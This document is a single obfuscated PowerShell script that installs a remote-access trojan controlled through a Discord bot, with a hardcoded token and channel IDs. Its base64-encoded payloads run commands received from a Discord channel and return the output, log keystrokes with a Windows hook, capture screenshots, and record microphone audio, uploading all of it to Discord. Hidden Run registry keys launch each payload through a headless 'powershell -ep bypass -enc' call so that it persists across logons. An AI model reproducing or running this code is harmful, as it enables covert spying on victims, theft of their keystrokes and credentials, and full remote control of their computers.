$token="MTQ2NTA1OTI0ODExNDM2ODgwNw.G8laVz.i314VPuXevIwavIMtqH0FzcxC_RSvnIoT5Wk0c";$clcid="1465057106188173413";$klcid="1465057106188173414";$sccid="1465057328498741515";$arcid="1465057437919870977";$cl64=[Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes('$token="'+$token+'";$cid="'+$clcid+'";$w=New-Object Net.WebClient;$w.Headers.Add("Authorization", "Bot $token");while ($true) {;$w.Headers["Content-Type"] = "application/json";$r=$w.DownloadString("https://discord.com/api/v10/channels/$cid/messages");$z= $r|ConvertFrom-Json;$cmd=$z | ? { -not $_.author.bot } | select -First 1;if ($cmd.content -eq $pcmd) {sleep 5}else {try {$out=iex $cmd.content|Out-String;if (-not $out) {$out="none"}} catch {$out = $_.Exception.Message};if ($out.Length -gt 2000) {$x2 = for ($i = 0; $i -lt $out.Length; $i += 2000) {$out.Substring($i, [Math]::Min(2000, $out.Length - $i))};foreach ($out2 in $x2) {$x=@{ content = $out2 } | ConvertTo-Json;$w.Headers["Content-Type"] = "application/json" ;$w.UploadString("https://discord.com/api/v10/channels/$cid/messages", "POST", $x);sleep 1}}else {$w.Headers["Content-Type"] = "application/json";$x=@{ content = $out } | ConvertTo-Json;$w.UploadString("https://discord.com/api/v10/channels/$cid/messages", "POST", $x)};$pcmd = $cmd.content}}'));$kl64=[Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes('$a=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String("dXNpbmcgU3lzdGVtOwp1c2luZyBTeXN0ZW0uVGV4dDsKdXNpbmcgU3lzdGVtLklPOwp1c2luZyBTeXN0ZW0uTmV0Lkh0dHA7CnVzaW5nIFN5c3RlbS5UaHJlYWRpbmcuVGFza3M7CnVzaW5nIFN5c3RlbS5EaWFnbm9zdGljczsKdXNpbmcgU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzOwp1c2luZyBTeXN0ZW0uV2luZG93cy5Gb3JtczsKbmFtZXNwYWNlIFhSCnsKCXB1YmxpYyBzdGF0aWMgY2xhc3MgR2xvYmFscwoJewoJCXB1YmxpYyBzdGF0aWMgc3RyaW5nIEFwcE5hbWUyID0gIk15QXBwIjsKCQlwdWJsaWMgc3RhdGljIHN0cmluZyBBcHBOYW1lID0gIk15QXBwIjsKCX0KCglwdWJsaWMgc3RhdGljIGNsYXNzIFByb2dyYW0KCXsKCQlwcml2YXRlIHN0YXRpYyBpbnQgaXRlciA9IDA7CgkJcHJpdmF0ZSBzdGF0aWMgU3RyaW5nQnVpbGRlciBidWYgPSBuZXcgU3RyaW5nQnVpbGRlcigpOwoJCXByaXZhdGUgc3RhdGljIEhvb2tQcm9jIGhvb2tQcm9jID0gSG9va0NhbGxiYWNrOwoJCXByaXZhdGUgc3RhdGljIEludFB0ciBob29rSWQgPSBJbnRQdHIuWmVybzsKCQlwdWJsaWMgc3RhdGljIHZvaWQgTWFpbihzdHJpbmdbXSBhcmdzKSAKCQl7CQoJCQlHbG9iYWxzLkFwcE5hbWU9YXJnc1swXTsKCQkJR2xvYmFscy5BcHBOYW1lMj1hcmdzWzFdOwoJCQlob29rSWQgPSBTZXRIb29rKGhvb2tQcm9jKTsKCQkJQXBwbGljYXRpb24uUnVuKCk7CgkJCVVuaG9va1dpbmRvd3NIb29rRXgoaG9va0lkKTsKCQl9CgoJCXByaXZhdGUgc3RhdGljIEludFB0ciBTZXRIb29rKEhvb2tQcm9jIGhvb2tQcm9jKSAKCQl7CgkJCUludFB0ciBtb2R1bGVIYW5kbGUgPSBHZXRNb2R1bGVIYW5kbGUoUHJvY2Vzcy5HZXRDdXJyZW50UHJvY2VzcygpLk1haW5Nb2R1bGUuTW9kdWxlTmFtZSk7CgkJCXJldHVybiBTZXRXaW5kb3dzSG9va0V4KDEzLCBob29rUHJvYywgbW9kdWxlSGFuZGxlLCAwKTsKCQl9CgkJcHJpdmF0ZSBkZWxlZ2F0ZSBJbnRQdHIgSG9va1Byb2MoaW50IG5Db2RlLCBJbnRQdHIgd1BhcmFtLCBJbnRQdHIgbFBhcmFtKTsKCQlwdWJsaWMgc3RhdGljIGFzeW5jIFRhc2sgU2VuZE1lc3NhZ2VBc3luYyhzdHJpbmcgdG9rZW4sIHN0cmluZyBjaGFubmVsSWQsIHN0cmluZyBtZXNzYWdlKQoJCXsKCQkJdXNpbmcgKHZhciBjbGllbnQgPSBuZXcgSHR0cENsaWVudCgpKQoJCQl7CgkJCQljbGllbnQuRGVmYXVsdFJlcXVlc3RIZWFkZXJzLkFkZCgiQXV0aG9yaXphdGlvbiIsICJCb3QgIit0b2tlbik7CgkJCQl2YXIgbWVzc2FnZURhdGEgPSBuZXcKCQkJCXsKCQkJCQljb250ZW50ID0gbWVzc2FnZQoJCQkJfTsKCQoJCQkJc3RyaW5nIGpzb25Db250ZW50ID0gIntcImNvbnRlbnRcIjpcIiIrbWVzc2FnZSsiXCJ9IjsKCQoJCQkJdmFyIGNvbnRlbnQgPSBuZXcgU3RyaW5nQ29udGVudChqc29uQ29udGVudCxFbmNvZGluZy5VVEY4LCJhcHBsaWNhdGlvbi9qc29uIik7CgkKCQkJCUh0dHBSZXNwb25zZU1lc3NhZ2UgcmVzcG9uc2UgPSBhd2FpdCBjbGllbnQuUG9zdEFzeW5jKCJodHRwczovL2Rpc2NvcmQuY29tL2FwaS92MTAvY2hhbm5lbHMvIitjaGFubmVsSWQrIi9tZXNzYWdlcyIsIGNvbnRlbnQpOwoJCQkJaWYgKHJlc3BvbnNlLklzU3VjY2Vzc1N0YXR1c0NvZGUpCgkJCQl7CgkJCQkJQ29uc29sZS5Xcml0ZUxpbmUoIk1lc3NhZ2Ugc2VudCBzdWNjZXNzZnVsbHkhIik7CgkJCQl9CgkJCQllbHNlCgkJCQl7CgkJCQkJc3RyaW5nIGVycm9yID0gYXdhaXQgcmVzcG9uc2UuQ29udGVudC5SZWFkQXNTdHJpbmdBc3luYygpOwoJCQkJCUNvbnNvbGUuV3JpdGVMaW5lKCJGYWlsZWQgdG8gc2VuZCBtZXNzYWdlOiB7cmVzcG9uc2UuU3RhdHVzQ29kZX0sICIrZXJyb3IpOwoJCQkJfQoJCQl9CgkJfQoJCXByaXZhdGUgc3RhdGljIEludFB0ciBIb29rQ2FsbGJhY2soaW50IG5Db2RlLCBJbnRQdHIgd1BhcmFtLCBJbnRQdHIgbFBhcmFtKQoJCXsKCQkJaWYgKG5Db2RlID49IDAgJiYgd1BhcmFtID09IChJbnRQdHIpMHgwMTAwKSAKCQkJewoJCQkJaW50IHZrQ29kZSA9IE1hcnNoYWwuUmVhZEludDMyKGxQYXJhbSk7CgkJCQlpdGVyKys7CgkJCQlzdHJpbmcga2V5ID0gKChLZXlzKXZrQ29kZSkuVG9TdHJpbmcoKTsKCQkJCWlmIChrZXkuTGVuZ3RoID4gMSkKCQkJCQlrZXkgPSBzdHJpbmcuRm9ybWF0KCJbezB9XSAiLCBrZXkpOwoJCQkJYnVmLkFwcGVuZChrZXkpOwoJCQkJaWYgKGl0ZXIgPT0gMjAwKSB7CgkJCQkJdmFyIF8gPSBTZW5kTWVzc2FnZUFzeW5jKEdsb2JhbHMuQXBwTmFtZSwgR2xvYmFscy5BcHBOYW1lMiwgYnVmLlRvU3RyaW5nKCkpOwoJCQkJCWJ1Zi5DbGVhcigpOwoJCQkJCWl0ZXIgPSAwOwoJCQkJfQoJCQl9CgkJCXJldHVybiBDYWxsTmV4dEhvb2tFeChob29rSWQsIG5Db2RlLCB3UGFyYW0sIGxQYXJhbSk7CgkJfQoJCVtEbGxJbXBvcnQoInVzZXIzMi5kbGwiKV0KCQlwcml2YXRlIHN0YXRpYyBleHRlcm4gYm9vbCBVbmhvb2tXaW5kb3dzSG9va0V4KEludFB0ciBoaGspOwoJCQoJCVtEbGxJbXBvcnQoImtlcm5lbDMyLmRsbCIpXQoJCXByaXZhdGUgc3RhdGljIGV4dGVybiBJbnRQdHIgR2V0TW9kdWxlSGFuZGxlKHN0cmluZyBscE1vZHVsZU5hbWUpOwoKCQlbRGxsSW1wb3J0KCJ1c2VyMzIuZGxsIildCgkJcHJpdmF0ZSBzdGF0aWMgZXh0ZXJuIEludFB0ciBDYWxsTmV4dEhvb2tFeChJbnRQdHIgaGhrLCBpbnQgbkNvZGUsIEludFB0ciB3UGFyYW0sIEludFB0ciBsUGFyYW0pOwoJCgkJW0RsbEltcG9ydCgidXNlcjMyLmRsbCIpXQoJCXByaXZhdGUgc3RhdGljIGV4dGVybiBJbnRQdHIgU2V0V2luZG93c0hvb2tFeChpbnQgaWRIb29rLCBIb29rUHJvYyBscGZuLCBJbnRQdHIgaE1vZCwgdWludCBkd1RocmVhZElkKTsKCX0KfQ=="));add-type -typedef $a -ra System.Windows.Forms, System.Net.Http;[XR.Program]::Main(@("'+$token+'","'+$klcid+'"))'));$sc64=[Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes('add-type -an System.Drawing,System.Net.Http;while ($true) {$g=new-guid;$res = (Get-WmiObject Win32_VideoController).VideoModeDescription-split" x ";$width  = [int]$res[0];$height = [int]$res[1];$bitmap = New-Object Drawing.Bitmap $width, $height;$graphics = [Drawing.Graphics]::FromImage($bitmap);$graphics.CopyFromScreen(0,0,0,0,(New-Object Drawing.Size $width, $height));$bitmap.Save("$env:temp/$g.png");$payload = @{content = (Get-Date).ToString()}|ConvertTo-Json;$client = New-Object Net.Http.HttpClient;$client.DefaultRequestHeaders.Authorization = New-Object Net.Http.Headers.AuthenticationHeaderValue("Bot", "'+$token+'");$content = New-Object Net.Http.MultipartFormDataContent;$payloadContent = New-Object Net.Http.StringContent($payload, [Text.Encoding]::UTF8, "application/json");$content.Add($payloadContent, "payload_json");$fileContent = New-Object Net.Http.ByteArrayContent(,[IO.File]::ReadAllBytes("$env:Temp/$g.png"));$fileContent.Headers.ContentType = [Net.Http.Headers.MediaTypeHeaderValue]::Parse("image/png");$content.Add($fileContent, "files[0]", "screen.png");$client.PostAsync("https://discord.com/api/v10/channels/'+$sccid+'/messages", $content).Result;ri "$env:temp/$g.png"; sleep 5}'));$ar64=[Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes('add-type -an System.Net.Http;while ($true) {$m=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String("dXNpbmcgU3lzdGVtOwp1c2luZyBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXM7CnB1YmxpYyBjbGFzcyBNY2kKewogICAgW0RsbEltcG9ydCgid2lubW0uZGxsIildCiAgICBwdWJsaWMgc3RhdGljIGV4dGVybiBpbnQgbWNpU2VuZFN0cmluZyhzdHJpbmcgY29tbWFuZCwgU3lzdGVtLlRleHQuU3RyaW5nQnVpbGRlciBidWZmZXIsIGludCBidWZmZXJTaXplLCBJbnRQdHIgaHduZENhbGxiYWNrKTsKfQ=="));Add-Type $m;$g=new-guid;[Mci]::mciSendString("open new Type waveaudio Alias recsound", $null, 120, [IntPtr]::Zero);$r=[Mci]::mciSendString("record recsound", $null, 0, [IntPtr]::Zero);if (!$r-eq0){return $r};sleep 5;[Mci]::mciSendString("save recsound $env:temp/$g.wav", $null, 0, [IntPtr]::Zero);[Mci]::mciSendString("close recsound", $null, 0, [IntPtr]::Zero);$payload = @{content = (Get-Date).ToString()}|ConvertTo-Json;$client = New-Object Net.Http.HttpClient;$client.DefaultRequestHeaders.Authorization = New-Object Net.Http.Headers.AuthenticationHeaderValue("Bot", "'+$token+'");$content = New-Object Net.Http.MultipartFormDataContent;$payloadContent = New-Object Net.Http.StringContent($payload, [Text.Encoding]::UTF8, "application/json");$content.Add($payloadContent, "payload_json");$fileContent = New-Object Net.Http.ByteArrayContent(,[IO.File]::ReadAllBytes("$env:Temp/$g.wav"));$fileContent.Headers.ContentType = [Net.Http.Headers.MediaTypeHeaderValue]::Parse("audio/wav");$content.Add($fileContent, "files[0]", "audio.wav");$client.PostAsync("https://discord.com/api/v10/channels/'+$arcid+'/messages", $content).Result;ri "$env:temp/$g.wav"}'));$w='conhost --headless powershell -ep bypass -enc ';$cl=$w+$cl64;$kl=$w+$kl64;$sc=$w+$sc64;$ar=$w+$ar64;reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v $(new-guid) /t REG_SZ /d $cl;reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v $(new-guid) /t REG_SZ /d $kl;reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v $(new-guid) /t REG_SZ /d $sc;reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v $(new-guid) /t REG_SZ /d $sc;iex $cl;iex $kl;iex $sc;iex $ar